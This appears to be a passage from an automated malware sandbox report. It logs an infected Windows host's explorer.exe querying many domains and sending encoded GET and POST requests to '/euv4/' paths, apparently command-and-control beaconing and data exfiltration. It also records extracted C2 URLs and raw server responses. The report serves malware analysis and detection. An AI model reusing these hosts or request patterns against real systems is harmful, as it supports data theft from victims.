          Source: C:\Windows\explorer.exeDomain query: www.rematedeldia.com
          Source: C:\Windows\explorer.exeDomain query: www.cielotherepy.com
          Source: C:\Windows\explorer.exeDomain query: www.byausorsm26-plala.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 206.188.193.90 80
          Source: C:\Windows\explorer.exeDomain query: www.the-pumps.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.217 80
          Source: C:\Windows\explorer.exeDomain query: www.20dzwww.com
          Source: C:\Windows\explorer.exeDomain query: www.game2plays.com
          Source: C:\Windows\explorer.exeDomain query: www.kreativevisibility.net
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.214.189 80
          Source: C:\Windows\explorer.exeDomain query: www.t1uba.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.89.53.122 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.240 80
          Source: C:\Windows\explorer.exeDomain query: www.bubu3cin.com
          Source: C:\Windows\explorer.exeNetwork Connect: 119.28.141.142 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.anniebapartments.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.120.156.91 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80
          Source: C:\Windows\explorer.exeDNS query: www.byausorsm26-plala.xyz
          Source: Malware configuration extractorURLs: www.rematedeldia.com/euv4/
          Source: global trafficHTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=85mQjwU+wMRs83r0GOSrcIreOiba9zyWW+CS0GLKbh9gHly9YGpiGKD2AN9MIjoCEE7/ HTTP/1.1Host: www.handejqr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=cI3g5knJJqXkP8IW+Xza8klzbxDoXV64MSKEiVzom8B632K++iscclio36YMg8rUOzdW&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.game2plays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=HAa1B5AppjYU5aCns58Lm/lX0LPKjP/AouTCOfgyvRhMztBouTXibUsUAqGI4dNLtbsU HTTP/1.1Host: www.the-pumps.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=dD0iDvhn43tXR1Irz5moIEmsbBY1tPeSvnURlL34d3R1xCqqo0E9W1015A+nmD7pBEru&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.bendyourtongue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=oa9knNpzlYsET7a400NCf8AEb2m6hfIC7IipfrPHZRwez4UH0nI2ep6CPiEzZPUmbJ08 HTTP/1.1Host: www.librairie-adrienne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=TRVfPireTl1Is9Bc/KiHpdfMWo5oXu88iiOyppyrwJSTQqYmoSBf8ZBQ12CtfhZ4Lehs HTTP/1.1Host: www.alifdanismanlik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=2pA74KfmfI5hbfJaDEWFAi8e35ziQ8w4QN1jZFvj4D6XG6sLMhvt5UuKdjwJiJArEaUB&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.anniebapartments.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=cWiJLLMFkNIAGeNHPwohgYgPINYIsRPE+G/+VQN9zUpY6o9lKCFsb+tpXVk1tI7skOBU HTTP/1.1Host: www.20dzwww.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjv+n3r1qMt HTTP/1.1Host: www.rematedeldia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=a7oTRd/pafA2z6myMPYHhwtmlIDdFKKQLm2w9Ocm2aQfWI2wtWEKtniCrep29h+E27Ao&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.t1uba.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj HTTP/1.1Host: www.bubu3cin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=0/dJtH7M4g2rGzhc4ssn0iUTCcnOaabGkVzvgj8FSqwfpf+jwBLQmuE48r3s2Xb3yHtY HTTP/1.1Host: www.bestpleasure4u.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=HPV4Q5EPJeH3saw4EFBeN7zL1ZdIcL1Uj7IqLRyb3oQKdylxfekoquh9Ej8w+ItW/Czf&nN6=6lpDqpn0n2Bl9fTP HTTP/1.1Host: www.cielotherepy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=rHTt4/gAXbFdLDnVce2ivV2H4joOeuBJUkkeDtonXvza2SG7LjkAPmebStjpTvpYTNdp HTTP/1.1Host: www.pkem.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.bubu3cin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=QBHbLVxXFBQ8vZs3HYaMEcVKayZ3Jv10zmSp74hjINFs4RkrUT15e8jtDg9xTHBGuf3s&nN6=6lpDqpn0n2Bl9fTP HTTP/1.1Host: www.mehfeels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: POST /euv4/ HTTP/1.1Host: www.mehfeels.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.mehfeels.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mehfeels.com/euv4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 58 78 58 6b 3d 66 44 7a 68 56 79 42 43 5a 54 41 62 35 72 56 62 62 76 4c 37 56 35 56 52 4f 67 64 45 42 64 35 49 70 42 7a 71 71 34 52 6d 50 50 5a 4e 39 46 4d 4b 53 41 34 42 4d 59 54 75 52 79 42 37 61 46 74 76 6d 73 43 62 45 53 77 76 57 75 57 54 6a 72 64 4e 73 32 38 53 7a 76 50 56 34 71 6b 35 77 75 76 6e 51 74 73 53 48 38 6f 6c 79 4e 6e 2d 48 45 34 44 51 4e 58 67 39 5f 32 38 50 76 7a 77 50 66 65 44 57 36 36 32 7a 62 63 6c 59 49 4c 34 53 42 57 73 69 48 4d 69 28 4f 6e 6f 4d 64 61 56 78 66 32 47 6e 75 70 31 6a 6c 51 4f 6b 65 61 52 6b 6c 69 49 44 33 56 78 6b 61 71 78 76 6a 41 74 4f 34 6b 77 4d 39 39 6d 44 2d 62 4a 6d 4b 43 6f 37 30 43 39 76 4b 78 39 69 63 4e 65 56 77 32 4e 73 67 78 50 41 4d 73 72 59 56 36 63 7a 48 73 6b 56 4e 49 77 47 62 6d 4f 6c 4c 70 64 4e 41 71 39 34 4f 36 57 4e 63 39 56 4b 53 61 4f 48 57 54 57 38 4b 6d 31 39 6c 6d 78 69 44 58 4e 56 4a 64 52 56 73 39 68 53 74 48 76 43 66 67 76 6f 44 50 55 79 61 59 53 6b 37 72 30 28 35 42 39 70 2d 7e 6a 56 77 65 46 55 77 78 54 75 4a 4d 2d 48 38 68 52 49 35 76 6f 47 43 57 56 34 5a 49 70 73 50 4f 36 39 34 6b 52 34 38 62 53 58 43 48 34 4b 72 4a 4c 31 39 4b 4f 54 5f 78 59 56 4f 39 6d 39 6d 39 70 30 66 7a 5a 65 2d 52 6f 64 53 45 59 49 74 39 4c 6e 66 74 49 54 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BXxXk=fDzhVyBCZTAb5rVbbvL7V5VROgdEBd5IpBzqq4RmPPZN9FMKSA4BMYTuRyB7aFtvmsCbESwvWuWTjrdNs28SzvPV4qk5wuvnQtsSH8olyNn-HE4DQNXg9_28PvzwPfeDW662zbclYIL4SBWsiHMi(OnoMdaVxf2Gnup1jlQOkeaRkliID3VxkaqxvjAtO4kwM99mD-bJmKCo70C9vKx9icNeVw2NsgxPAMsrYV6czHskVNIwGbmOlLpdNAq94O6WNc9VKSaOHWTW8Km19lmxiDXNVJdRVs9hStHvCfgvoDPUyaYSk7r0(5B9p-~jVweFUwxTuJM-H8hRI5voGCWV4ZIpsPO694kR48bSXCH4KrJL19KOT_xYVO9m9m9p0fzZe-RodSEYIt9LnftITg).
          Source: global trafficHTTP traffic detected: POST /euv4/ HTTP/1.1Host: www.mehfeels.comConnection: closeContent-Length: 36479Cache-Control: no-cacheOrigin: http://www.mehfeels.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mehfeels.com/euv4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 58 78 58 6b 3d 66 44 7a 68 56 7a 39 51 48 77 45 34 33 62 4a 52 66 64 37 76 62 6f 6c 58 4d 77 5a 78 46 73 46 54 74 7a 62 41 75 35 68 66 4f 4e 4a 58 77 56 34 72 57 44 49 4a 4d 59 69 34 64 68 31 5f 51 46 68 6f 6d 73 71 6c 45 53 6b 76 58 75 75 44 36 4e 41 69 72 55 55 54 79 50 50 70 37 71 6c 76 30 73 61 46 51 74 6f 38 48 38 68 67 78 2d 7a 2d 49 42 6b 44 45 2d 50 72 7a 5f 32 36 41 5f 43 68 4c 65 6a 76 57 36 69 51 7a 61 67 6c 5a 34 50 34 55 68 6d 72 31 51 68 30 32 2d 6e 68 65 4e 61 4d 71 76 71 53 6e 74 46 4c 6a 6b 73 4f 6b 73 4f 52 6c 30 43 49 46 47 56 75 76 4b 71 4f 35 54 41 38 66 6f 6f 62 4d 39 67 30 44 36 6a 33 6d 59 65 6f 37 45 43 2d 72 64 46 66 6d 50 56 77 59 52 53 36 73 67 4d 45 41 5a 4d 6a 59 51 7a 6f 6c 6c 31 61 4a 5f 68 6c 47 5a 4b 6f 69 62 70 6e 66 67 72 35 34 4f 37 6e 4e 63 39 72 4b 53 71 4f 48 52 50 57 38 76 71 31 71 33 4f 32 74 44 58 4d 4d 5a 63 4d 66 4d 68 4e 53 74 4f 30 43 65 4a 4b 6f 30 33 55 6a 4c 6f 53 73 6f 7a 7a 6e 4a 42 5f 6b 65 7e 32 66 51 65 30 55 77 78 6c 75 49 4d 58 48 4b 35 52 4f 6f 76 6f 47 67 4f 56 36 70 49 70 78 5f 4f 43 7a 59 34 6e 34 38 44 57 58 44 57 50 4b 59 46 4c 79 73 71 4f 54 65 78 59 53 2d 39 6d 78 47 38 56 30 4b 62 54 58 75 39 64 4f 42 34 78 42 71 63 2d 79 66 34 52 44 33 45 35 7e 34 52 77 6c 71 63 53 66 73 4b 68 79 79 58 56 74 6c 6d 39 48 59 34 64 67 4b 7e 42 65 35 54 68 69 4b 30 33 79 76 49 75 31 32 4d 4b 4e 53 4f 78 42 4b 66 46 66 4b 67 5f 73 44 74 35 6a 45 4d 58 4e 6a 44 42 31 55 59 6a 58 77 51 37 46 6c 65 47 42 6d 58 53 53 76 45 46 79 50 57 7a 45 49 4c 45 4a 37 55 45 41 63 53 71 77 36 58 48 36 76 65 4a 34 6d 34 42 42 34 73 48 69 61 31 63 4a 54 4c 6f 79 34 5a 6f 7a 35 38 47 47 51 79 62 54 65 6c 61 54 53 49 50 54 46 68 69 7a 4e 50 5f 6e 71 45 74 55 71 39 66 43 64 76 4c 35 47 6b 59 66 6f 75 2d 56 36 38 6d 39 75 77 31 62 71 33 72 38 70 57 54 67 45 4c 62 49 5f 38 49 54 71 77 6e 74 4a 58 5f 6d 6c 6a 4f 76 51 77 41 48 33 7a 5a 49 49 52 31 62 39 50 48 57 42 52 39 6f 41 65 61 61 44 41 41 43 6c 32 66 74 36 44 6a 41 65 69 54 57 73 64 41 4b 7a 33 43 7a 6d 5a 4e 6c 34 63 78 62 65 4e 51 6e 42 56 34 79 5f 4f 48 59 45 65 5a 36 5f 6e 46 62 4d 6c 6b 35 59 39 54 57 48 74 34 51 4a 57 47 4c 67 71 56 4d 32 77 51 31 68 63 71 78 37 6c 31 61 72 64 4e 39 30 67 63 43 70 30 57 72 48 53 4f 4b 39 28 6e 28 37 37 41 75 76 4f 4f 6b 78 4c 5a 5a 58 7e 46 34 4c 6f 51 46 37 73 64 62 57 4f 73 66 65 4b 74 51 31 28 72 5a 65 7e 42 32 66 39 49 47 48 76 4d 4e 36 54 51 43 54 61 45 30 6a 34 72 6d 5a 49 6b 73 42 65 4c 72 31 58 31 46 48 6c 42 33 33 75 6f 30 47 4c 70 7a 64 6d 58 4b 57 79 74 65 4d 5a 34 53 76 63 53 31 46 58 46 70 6f 38 49 36 73 47 71 79 6c 56 52
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 18:03:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingData Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 28 Jan 2022 18:04:04 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 18:04:14 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 18:05:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 194X-Sorting-Hat-ShopId: 59946500291X-Dc: gcp-europe-west1X-Request-ID: a7524e7b-21da-41ed-8d26-0413ce3d8724X-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6d4c25e13f0e915f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 18:05:33 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 62 75 33 63 69 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.bubu3cin.com Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 18:06:00 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 62 75 33 63 69 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.bubu3cin.com Port 80</address></body></html>
